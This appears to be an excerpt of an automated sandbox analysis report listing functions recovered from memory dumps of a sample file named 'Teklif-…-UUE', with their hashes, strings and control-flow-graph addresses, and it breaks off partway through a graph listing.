                                                          • Snapshot File: hcaresult_0_2_5980000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: PH]q
                                                          • API String ID: 0-3168235125
                                                          • Opcode ID: 4f31d7d490ac273f77153dd24b72205d20bf827ccf546211b3ca72ccb9ec8924
                                                          • Instruction ID: 72d6191b1a849344d4a01fdd109d15497adf12541c7e09fff2f80c6c820b72c7
                                                          • Opcode Fuzzy Hash: 4f31d7d490ac273f77153dd24b72205d20bf827ccf546211b3ca72ccb9ec8924
                                                          • Instruction Fuzzy Hash: 18B115B0D05218CFDB24EFA9D844BBDBBF6BF49304FA498A9D009A7251DB744985CF24
                                                          Function 0585673F Relevance: 1.5, Strings: 1, Instructions: 257COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Te]q
                                                          • API String ID: 0-52440209
                                                          • Opcode ID: 28c03adfafc34424da27f6963f08778da224c2f254ee65f9726eb27db8c32b79
                                                          • Instruction ID: 47e80d9e157b67490a9598c049e37d26f5d7a530cafafc988c88cd1f089d242f
                                                          • Opcode Fuzzy Hash: 28c03adfafc34424da27f6963f08778da224c2f254ee65f9726eb27db8c32b79
                                                          • Instruction Fuzzy Hash: 72B1D1B4E05208CFDB14CFAAD944AADBBF2BB49314F60816AD809EB351EB705D85CF41
                                                          Function 05988A78 Relevance: 1.5, Strings: 1, Instructions: 252COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231971594.0000000005980000.00000040.00000800.00020000.00000000.sdmp, Offset: 05980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5980000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: PH]q
                                                          • API String ID: 0-3168235125
                                                          • Opcode ID: fc8bbb48eaca752a870f2fc0b50565603af6dfefb23847904c07126e2ed7fa58
                                                          • Instruction ID: c2386d8ed1c9cc40979bac77c6640daecd675210175491f2ae5cce850276166d
                                                          • Opcode Fuzzy Hash: fc8bbb48eaca752a870f2fc0b50565603af6dfefb23847904c07126e2ed7fa58
                                                          • Instruction Fuzzy Hash: CCB104B0D05208CFDB24EFA9D844BBDBBF6BB49304FA49869D009AB251DB745985CF24
                                                          Function 058567B0 Relevance: 1.5, Strings: 1, Instructions: 227COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Te]q
                                                          • API String ID: 0-52440209
                                                          • Opcode ID: d010edbded77395ade0cce0da3a9ebde86a0964b88397f2d073cc826a2d5e30b
                                                          • Instruction ID: 3d03d77288d7437e08148664bbe6aaa9426ed6877f4e320a93eeac934f95728f
                                                          • Opcode Fuzzy Hash: d010edbded77395ade0cce0da3a9ebde86a0964b88397f2d073cc826a2d5e30b
                                                          • Instruction Fuzzy Hash: C6A1D2B4E05208CFDB14CFAAD945AADBBF2BB89314F608169D809EB355EB705D85CF01
                                                          Function 058567C0 Relevance: 1.5, Strings: 1, Instructions: 226COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Te]q
                                                          • API String ID: 0-52440209
                                                          • Opcode ID: 3d7e40b0787faa77fef4a2447fc53dfe253054f84e722c9909622476b39938bc
                                                          • Instruction ID: a721f185d512803db14c6652b6b53b4dd000959a5e554f0d0f1415e6d6236536
                                                          • Opcode Fuzzy Hash: 3d7e40b0787faa77fef4a2447fc53dfe253054f84e722c9909622476b39938bc
                                                          • Instruction Fuzzy Hash: 1891D274E05208CFDB14CFAAD945BADBBF2BB89314F609069D809EB255EB705D85CF01
                                                          Function 0598DA10 Relevance: 1.4, Strings: 1, Instructions: 188COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231971594.0000000005980000.00000040.00000800.00020000.00000000.sdmp, Offset: 05980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5980000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: tFindAtom
                                                          • API String ID: 0-1172336341
                                                          • Opcode ID: 1e036d2b74222ba2939efbbfe37039ae893d5084a6a593f23fea67009e2a9aae
                                                          • Instruction ID: e901ac977004d97446183f9bb8f9f80a7ca994f968af5b10777c79cd00f58623
                                                          • Opcode Fuzzy Hash: 1e036d2b74222ba2939efbbfe37039ae893d5084a6a593f23fea67009e2a9aae
                                                          • Instruction Fuzzy Hash: A181F670E01208DFDB44EFA9D484AAEBBF6FF89300F148069E409AB395DB34A945CF54
                                                          Function 0598DA20 Relevance: 1.4, Strings: 1, Instructions: 184COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231971594.0000000005980000.00000040.00000800.00020000.00000000.sdmp, Offset: 05980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5980000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: tFindAtom
                                                          • API String ID: 0-1172336341
                                                          • Opcode ID: e85bd0dc59676f6fd6ea8ca27ae6baa003fee9ded910d57f398c9f77d57a0364
                                                          • Instruction ID: f67c3534249469fff1c9acb72ff687782bba9c40dc2980f14006e2cc7b861520
                                                          • Opcode Fuzzy Hash: e85bd0dc59676f6fd6ea8ca27ae6baa003fee9ded910d57f398c9f77d57a0364
                                                          • Instruction Fuzzy Hash: C871E570E01208DFDB44EFA9D484AAEBBF6FF89300F148069E409AB395DB34A945CF54
                                                          Function 059608C0 Relevance: .3, Instructions: 272COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a1905aac939d8c67bc2e4836f8277ca7f49bb340505343492093bc30bb22572c
                                                          • Instruction ID: 86b77239d4040307180cf7e2bb8fab5e68b94c2b04f88f0ef42bc226c6cea462
                                                          • Opcode Fuzzy Hash: a1905aac939d8c67bc2e4836f8277ca7f49bb340505343492093bc30bb22572c
                                                          • Instruction Fuzzy Hash: 21C11774A01218CFEB54DFA9D998BADBBF6FB49304F1094A9D40DAB381CB745988CF11
                                                          Function 0596ED89 Relevance: .2, Instructions: 218COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e413b8c5c6e7a7f0276704a7f2514dc3529fefb9981877fe8d59658429f57e08
                                                          • Instruction ID: c0b312faa011717f52c4d11c9ca2c4de15bdfbf1edc6b2241907c63db6aba486
                                                          • Opcode Fuzzy Hash: e413b8c5c6e7a7f0276704a7f2514dc3529fefb9981877fe8d59658429f57e08
                                                          • Instruction Fuzzy Hash: 70912778D05208CFDB04DFA8D444BAEBBFAFB49304F24946AE409AB295DB749959CF04
                                                          Function 05855AD0 Relevance: .2, Instructions: 202COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2d882fb4fd5f88ec8ebaa0db342b3f9c61468c3d70b7a9761001a8193fb6515e
                                                          • Instruction ID: faf7af4b1d29c904d22384bb55b6a2411984febe834109def5782bda3a7e806c
                                                          • Opcode Fuzzy Hash: 2d882fb4fd5f88ec8ebaa0db342b3f9c61468c3d70b7a9761001a8193fb6515e
                                                          • Instruction Fuzzy Hash: 18910570D05218CFEB64CF6AD844BADBBF2BB49328F6490A9D809E7251EB745D85CF00
                                                          Function 05962320 Relevance: .2, Instructions: 201COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a2af87c04121af7aadc6352826a97a985862c692788033963590af9f7388472c
                                                          • Instruction ID: 3141899b929febf274468f37f17664fc8dcdc02612135d72665f4008925c96b5
                                                          • Opcode Fuzzy Hash: a2af87c04121af7aadc6352826a97a985862c692788033963590af9f7388472c
                                                          • Instruction Fuzzy Hash: 1E813878E04208CFCB14DF68D494BADBBF6FB4A304F2490AAE409AB355DB759949CF01
                                                          Function 05855AC0 Relevance: .2, Instructions: 201COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9b2264a6eedca3186f2a733fbed8e806132ca05728e17c29a647b27bc4c054c2
                                                          • Instruction ID: 6c6da8949fc3319c0199f18b3a75165badc2ad59ca469fdb882b3b75d6b561b7
                                                          • Opcode Fuzzy Hash: 9b2264a6eedca3186f2a733fbed8e806132ca05728e17c29a647b27bc4c054c2
                                                          • Instruction Fuzzy Hash: C6910470E05218CFEB64CF6AD944BADBBF2BB49324F6480A9D809E7251DBB45D85CF00
                                                          Function 05855C30 Relevance: .2, Instructions: 172COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: eec030c70604ea92034e9c5b582eafa5b1a2defc25e738a8377409cc4b3c6209
                                                          • Instruction ID: 4878e155478d5f8a3669f800f943b9f94d55eb88d4dc78a504964cbc543e07dd
                                                          • Opcode Fuzzy Hash: eec030c70604ea92034e9c5b582eafa5b1a2defc25e738a8377409cc4b3c6209
                                                          • Instruction Fuzzy Hash: BA81E470D05218CFEB64CF6AD944BADBBF2BB49324F6490A9D809E7251EB749D80CF00
                                                          Function 05937EE8 Relevance: 4.2, Strings: 3, Instructions: 478COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 889 5937ee8-5937f10 891 5937f12-5937f59 889->891 892 5937f5e-5937f6c 889->892 940 59383b5-59383bc 891->940 893 5937f7b 892->893 894 5937f6e-5937f79 call 5935a10 892->894 896 5937f7d-5937f84 893->896 894->896 899 5937f8a-5937f8e 896->899 900 593806d-5938071 896->900 903 5937f94-5937f98 899->903 904 59383bd-59383e5 899->904 901 5938073-5938082 call 5933c28 900->901 902 59380c7-59380d1 900->902 918 5938086-593808b 901->918 909 59380d3-59380e2 call 5933348 902->909 910 593810a-5938130 902->910 907 5937faa-5938008 call 5935750 call 59361b8 903->907 908 5937f9a-5937fa4 903->908 914 59383ec-5938416 904->914 949 593847b-59384a5 907->949 950 593800e-5938068 907->950 908->907 908->914 922 59380e8-5938105 909->922 923 593841e-5938434 909->923 936 5938132-593813b 910->936 937 593813d 910->937 914->923 925 5938084 918->925 926 593808d-59380c2 call 5937db8 918->926 922->940 951 593843c-5938474 923->951 925->918 926->940 942 593813f-5938167 936->942 937->942 954 5938238-593823c 942->954 955 593816d-5938186 942->955 959 59384a7-59384ad 949->959 960 59384af-59384b5 949->960 950->940 951->949 961 59382b6-59382c0 954->961 962 593823e-5938257 954->962 955->954 980 593818c-593819b call 5933170 955->980 959->960 968 59384b6-59384f3 959->968 965 59382c2-59382cc 961->965 966 593831d-5938326 961->966 962->961 984 5938259-5938268 call 5933170 962->984 981 59382d2-59382e4 965->981 982 59382ce-59382d0 965->982 970 5938328-5938356 call 5934f60 call 5934f80 966->970 971 593835e-59383ab 966->971 970->971 990 59383b3 971->990 999 59381b3-59381c8 980->999 1000 593819d-59381a3 980->1000 987 59382e6-59382e8 981->987 982->987 1006 5938280-593828b 984->1006 1007 593826a-5938270 984->1007 995 5938316-593831b 987->995 996 59382ea-59382ee 987->996 990->940 995->965 995->966 1002 59382f0-5938309 996->1002 1003 593830c-5938311 call 5931f70 996->1003 1012 59381ca-59381f6 call 59340b0 999->1012 1013 59381fc-5938205 999->1013 1008 59381a7-59381a9 1000->1008 1009 59381a5 1000->1009 1002->1003 1003->995 1006->949 1020 5938291-59382b4 1006->1020 1018 5938272 1007->1018 1019 5938274-5938276 1007->1019 1008->999 1009->999 1012->951 1012->1013 1013->949 1017 593820b-5938232 1013->1017 1017->954 1017->980 1018->1006 1019->1006 1020->961 1020->984
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Haq$Haq$Haq
                                                          • API String ID: 0-3013282719
                                                          • Opcode ID: 0ccbdf0e13a2bf42331536ef14d8976caf9473732ffb9311fde140f91b23a56d
                                                          • Instruction ID: fc884563a72fbfe7138773f4a0a0f13f083b3dd7d82a94ed56a8736ecbd143f1
                                                          • Opcode Fuzzy Hash: 0ccbdf0e13a2bf42331536ef14d8976caf9473732ffb9311fde140f91b23a56d
                                                          • Instruction Fuzzy Hash: E0124834A00604CFCB65DFA5C885AAEBBF6FF89300F148929E5069B355DB35ED46CB90
                                                          Function 05939D18 Relevance: 4.1, Strings: 3, Instructions: 370COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1031 5939d18-5939d55 1033 5939d77-5939d8d call 5939b20 1031->1033 1034 5939d57-5939d5a 1031->1034 1040 593a103-593a117 1033->1040 1041 5939d93-5939d9f 1033->1041 1144 5939d5c call 593a630 1034->1144 1145 5939d5c call 593a688 1034->1145 1146 5939d5c call 593a678 1034->1146 1036 5939d62-5939d64 1036->1033 1038 5939d66-5939d6e 1036->1038 1038->1033 1048 593a157-593a160 1040->1048 1042 5939ed0-5939ed7 1041->1042 1043 5939da5-5939da8 1041->1043 1044 593a006-593a043 call 5939528 call 593c4d0 1042->1044 1045 5939edd-5939ee6 1042->1045 1046 5939dab-5939db4 1043->1046 1089 593a049-593a0fa call 5939528 1044->1089 1045->1044 1049 5939eec-5939ff8 call 5939528 call 5939ab8 call 5939528 1045->1049 1051 5939dba-5939dce 1046->1051 1052 593a1f8 1046->1052 1053 593a162-593a169 1048->1053 1054 593a125-593a12e 1048->1054 1142 593a003 1049->1142 1143 5939ffa 1049->1143 1062 5939ec0-5939eca 1051->1062 1063 5939dd4-5939e69 call 5939b20 * 2 call 5939528 call 5939ab8 call 5939b60 call 5939c08 call 5939c70 1051->1063 1061 593a1fd-593a201 1052->1061 1059 593a1b7-593a1be 1053->1059 1060 593a16b-593a1ae call 5939528 1053->1060 1054->1052 1057 593a134-593a146 1054->1057 1077 593a156 1057->1077 1078 593a148-593a14d 1057->1078 1064 593a1e3-593a1f6 1059->1064 1065 593a1c0-593a1d0 1059->1065 1060->1059 1068 593a203 1061->1068 1069 593a20c 1061->1069 1062->1042 1062->1046 1121 5939e6b-5939e83 call 5939c08 call 5939528 call 59397d8 1063->1121 1122 5939e88-5939ebb call 5939c70 1063->1122 1064->1061 1065->1064 1081 593a1d2-593a1da 1065->1081 1068->1069 1076 593a20d 1069->1076 1076->1076 1077->1048 1147 593a150 call 593cc62 1078->1147 1148 593a150 call 593cc70 1078->1148 1081->1064 1089->1040 1121->1122 1122->1062 1142->1044 1143->1142 1144->1036 1145->1036 1146->1036 1147->1077 1148->1077
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4']q$4']q$4']q
                                                          • API String ID: 0-705557208
                                                          • Opcode ID: 244936e2f13b318d8667876b4c8c206d30faae5b436f4e3ca45a31e811e98b1e
                                                          • Instruction ID: 0b8b96a9013e7e8286b0221a0ce8792ad8de3bf98b9125d0725f850546280b6d
                                                          • Opcode Fuzzy Hash: 244936e2f13b318d8667876b4c8c206d30faae5b436f4e3ca45a31e811e98b1e
                                                          • Instruction Fuzzy Hash: 97F1B434A10118DFCB08DFA4D999EADBBB2FF89300F558559E806AB365DB71EC42CB50
                                                          Function 0593E2F0 Relevance: 4.1, Strings: 3, Instructions: 364COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1150 593e2f0-593e310 1151 593e316-593e31a 1150->1151 1152 593e429-593e44e 1150->1152 1153 593e320-593e329 1151->1153 1154 593e455-593e47a 1151->1154 1152->1154 1155 593e481-593e4b7 1153->1155 1156 593e32f-593e356 1153->1156 1154->1155 1174 593e4be-593e514 1155->1174 1167 593e41e-593e428 1156->1167 1168 593e35c-593e35e 1156->1168 1170 593e360-593e363 1168->1170 1171 593e37f-593e381 1168->1171 1173 593e369-593e373 1170->1173 1170->1174 1172 593e384-593e388 1171->1172 1177 593e38a-593e399 1172->1177 1178 593e3e9-593e3f5 1172->1178 1173->1174 1176 593e379-593e37d 1173->1176 1189 593e516-593e52a 1174->1189 1190 593e538-593e54f 1174->1190 1176->1171 1176->1172 1177->1174 1184 593e39f-593e3e6 call 5931fa0 1177->1184 1178->1174 1179 593e3fb-593e418 call 5931fa0 1178->1179 1179->1167 1179->1168 1184->1178 1266 593e52d call 593eb7a 1189->1266 1267 593e52d call 593ea18 1189->1267 1198 593e640-593e650 1190->1198 1199 593e555-593e63b call 5939b20 call 5939528 * 2 call 5939b60 call 593d338 call 5939528 call 593c4d0 call 593a3c8 1190->1199 1197 593e533 1201 593e763-593e76e 1197->1201 1210 593e656-593e730 call 5939b20 * 2 call 593a2d8 call 5939528 * 2 call 59397d8 call 5939c70 call 5939528 1198->1210 1211 593e73e-593e75a call 5939528 1198->1211 1199->1198 1208 593e770-593e780 1201->1208 1209 593e79d-593e7be call 5939c70 1201->1209 1223 593e782-593e788 1208->1223 1224 593e790-593e798 call 593a3c8 1208->1224 1263 593e732 1210->1263 1264 593e73b 1210->1264 1211->1201 1223->1224 1224->1209 1263->1264 1264->1211 1266->1197 1267->1197
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (aq$(aq$Haq
                                                          • API String ID: 0-2456560092
                                                          • Opcode ID: 20f30c91e258a23b6d9c4164e73c201debee28ff75fd2e9de270794243749a99
                                                          • Instruction ID: bc97a6d615e7beaa4cafb5a3f732cf7483524122a4c2b97b2db00e4d7effc473
                                                          • Opcode Fuzzy Hash: 20f30c91e258a23b6d9c4164e73c201debee28ff75fd2e9de270794243749a99
                                                          • Instruction Fuzzy Hash: 0FE13034B00209DFCB04EFA4D4959AEBBB6FF89300F158569E506AB365DB34ED42CB90
                                                          Function 057C0D98 Relevance: 3.1, Strings: 2, Instructions: 577COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2230984646.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_57c0000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4']q$4']q
                                                          • API String ID: 0-3120983240
                                                          • Opcode ID: 469d7a587667b68d1400255fcd21e5d379c39247f342b77c4e3dfde4654b7643
                                                          • Instruction ID: e472b46c9859da37734f2734b0c99f6588b222d88d3ecb88215acd65862088ff
                                                          • Opcode Fuzzy Hash: 469d7a587667b68d1400255fcd21e5d379c39247f342b77c4e3dfde4654b7643
                                                          • Instruction Fuzzy Hash: C542B3B4E04209CFCB14DF98D458AFEBBB6FB49301F5080ADE91267295C7785982DF91
                                                          Function 05934408 Relevance: 3.0, Strings: 2, Instructions: 516COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1720 5934408-593442e 1721 5934430-593443d 1720->1721 1722 593443f-5934448 1720->1722 1721->1722 1723 593444b-5934458 1721->1723 1724 5934463 1723->1724 1725 593445a-5934461 1723->1725 1726 593446a-5934494 1724->1726 1725->1726 1727 5934496 1726->1727 1728 593449d-59344b0 call 59340e8 1726->1728 1727->1728 1731 59344b6-59344c9 1728->1731 1732 59345f4-59345fb 1728->1732 1742 59344d7-59344f1 1731->1742 1743 59344cb-59344d2 1731->1743 1733 5934601-5934616 1732->1733 1734 5934895-593489c 1732->1734 1747 5934636-593463c 1733->1747 1748 5934618-593461a 1733->1748 1735 593490b-5934912 1734->1735 1736 593489e-59348a7 1734->1736 1738 5934918-5934921 1735->1738 1739 59349ae-59349b5 1735->1739 1736->1735 1741 59348a9-59348bc 1736->1741 1738->1739 1744 5934927-593493a 1738->1744 1745 59349d1-59349d7 1739->1745 1746 59349b7-59349c8 1739->1746 1741->1735 1763 59348be-5934903 call 59319a0 1741->1763 1758 59344f3-59344f6 1742->1758 1759 59344f8-5934505 1742->1759 1749 59345ed 1743->1749 1768 593494d-5934951 1744->1768 1769 593493c-593494b 1744->1769 1753 59349e9-59349f2 1745->1753 1754 59349d9-59349df 1745->1754 1746->1745 1770 59349ca 1746->1770 1755 5934642-5934644 1747->1755 1756 5934704-5934708 1747->1756 1748->1747 1751 593461c-5934633 1748->1751 1749->1732 1751->1747 1764 59349e1-59349e7 1754->1764 1765 59349f5-5934a39 1754->1765 1755->1756 1757 593464a-59346cb call 59319a0 * 4 1755->1757 1756->1734 1760 593470e-5934710 1756->1760 1833 59346e2-5934701 call 59319a0 1757->1833 1834 59346cd-59346df call 59319a0 1757->1834 1766 5934507-593451b 1758->1766 1759->1766 1760->1734 1767 5934716-593471f 1760->1767 1763->1735 1801 5934905-5934908 1763->1801 1764->1753 1764->1765 1815 5934a41-5934a6a 1765->1815 1766->1749 1800 5934521-5934575 1766->1800 1775 5934872-5934878 1767->1775 1776 5934953-5934955 1768->1776 1777 5934971-5934973 1768->1777 1769->1768 1770->1745 1780 593488b 1775->1780 1781 593487a-5934889 1775->1781 1776->1777 1784 5934957-593496e 1776->1784 1777->1739 1779 5934975-593497b 1777->1779 1779->1739 1786 593497d-59349ab 1779->1786 1789 593488d-593488f 1780->1789 1781->1789 1784->1777 1786->1739 1789->1734 1793 5934724-5934732 call 5933170 1789->1793 1807 5934734-593473a 1793->1807 1808 593474a-5934764 1793->1808 1841 5934583-5934587 1800->1841 1842 5934577-5934579 1800->1842 1801->1735 1811 593473e-5934740 1807->1811 1812 593473c 1807->1812 1808->1775 1817 593476a-593476e 1808->1817 1811->1808 1812->1808 1844 5934a78 1815->1844 1845 5934a6c-5934a76 1815->1845 1819 5934770-5934779 1817->1819 1820 593478f 1817->1820 1823 5934780-5934783 1819->1823 1824 593477b-593477e 1819->1824 1825 5934792-59347ac 1820->1825 1828 593478d 1823->1828 1824->1828 1825->1775 1847 59347b2-5934833 call 59319a0 * 4 1825->1847 1828->1825 1833->1756 1834->1833 1841->1749 1846 5934589-59345a1 1841->1846 1842->1841 1848 5934a7d-5934a7f 1844->1848 1845->1848 1846->1749 1854 59345a3-59345af 1846->1854 1874 5934835-5934847 call 59319a0 1847->1874 1875 593484a-5934870 call 59319a0 1847->1875 1850 5934a81-5934a84 1848->1850 1851 5934a86-5934a8b 1848->1851 1853 5934a91-5934abe 1850->1853 1851->1853 1856 59345b1-59345b4 1854->1856 1857 59345be-59345c4 1854->1857 1856->1857 1858 59345c6-59345c9 1857->1858 1859 59345cc-59345d5 1857->1859 1858->1859 1862 59345d7-59345da 1859->1862 1863 59345e4-59345ea 1859->1863 1862->1863 1863->1749 1874->1875 1875->1734 1875->1775
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $]q$$]q
                                                          • API String ID: 0-127220927
                                                          • Opcode ID: cb96acf7142bb793848b4fdbcb05159b98249574eb39d305cbcf487011fa7ec9
                                                          • Instruction ID: 5fd2aa2909bd44801e00b18b0bcdbb135315029e45eeccc1786bdd6e1b687644
                                                          • Opcode Fuzzy Hash: cb96acf7142bb793848b4fdbcb05159b98249574eb39d305cbcf487011fa7ec9
                                                          • Instruction Fuzzy Hash: F0226938E00259CFCF15DFA4D84AAAEBBF6FF48300F198414E845AB294DB749956CF51
                                                          Function 057C1DA8 Relevance: 3.0, Strings: 2, Instructions: 488COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1880 57c1da8-57c1dd3 1881 57c1dda-57c1df9 1880->1881 1882 57c1dd5 1880->1882 1883 57c1e1a 1881->1883 1884 57c1dfb-57c1e04 1881->1884 1882->1881 1887 57c1e1d-57c1e21 1883->1887 1885 57c1e0b-57c1e0e 1884->1885 1886 57c1e06-57c1e09 1884->1886 1888 57c1e18 1885->1888 1886->1888 1889 57c23dc-57c23f3 1887->1889 1888->1887 1891 57c23f9-57c23fd 1889->1891 1892 57c1e26-57c1e2a 1889->1892 1895 57c23ff-57c242f 1891->1895 1896 57c2432-57c2436 1891->1896 1893 57c1e2c-57c1e87 1892->1893 1894 57c1e2f-57c1e33 1892->1894 1905 57c1e8c-57c1e90 1893->1905 1906 57c1e89-57c1ee5 1893->1906 1900 57c1e5c-57c1e7e 1894->1900 1901 57c1e35-57c1e59 1894->1901 1895->1896 1897 57c2438-57c2441 1896->1897 1898 57c2457 1896->1898 1902 57c2448-57c244b 1897->1902 1903 57c2443-57c2446 1897->1903 1904 57c245a-57c2460 1898->1904 1900->1889 1901->1900 1909 57c2455 1902->1909 1903->1909 1912 57c1eb9-57c1edc 1905->1912 1913 57c1e92-57c1eb6 1905->1913 1915 57c1eea-57c1eee 1906->1915 1916 57c1ee7-57c1f48 1906->1916 1909->1904 1912->1889 1913->1912 1921 57c1f17-57c1f2e 1915->1921 1922 57c1ef0-57c1f14 1915->1922 1925 57c1f4d-57c1f51 1916->1925 1926 57c1f4a-57c1fa6 1916->1926 1935 57c1f3e-57c1f3f 1921->1935 1936 57c1f30-57c1f36 1921->1936 1922->1921 1932 57c1f7a-57c1f9d 1925->1932 1933 57c1f53-57c1f77 1925->1933 1937 57c1fa8-57c2004 1926->1937 1938 57c1fab-57c1faf 1926->1938 1932->1889 1933->1932 1935->1889 1936->1935 1946 57c2009-57c200d 1937->1946 1947 57c2006-57c2062 1937->1947 1943 57c1fd8-57c1ffb 1938->1943 1944 57c1fb1-57c1fd5 1938->1944 1943->1889 1944->1943 1953 57c200f-57c2033 1946->1953 1954 57c2036-57c2059 1946->1954 1956 57c2064-57c20c0 1947->1956 1957 57c2067-57c206b 1947->1957 1953->1954 1954->1889 1966 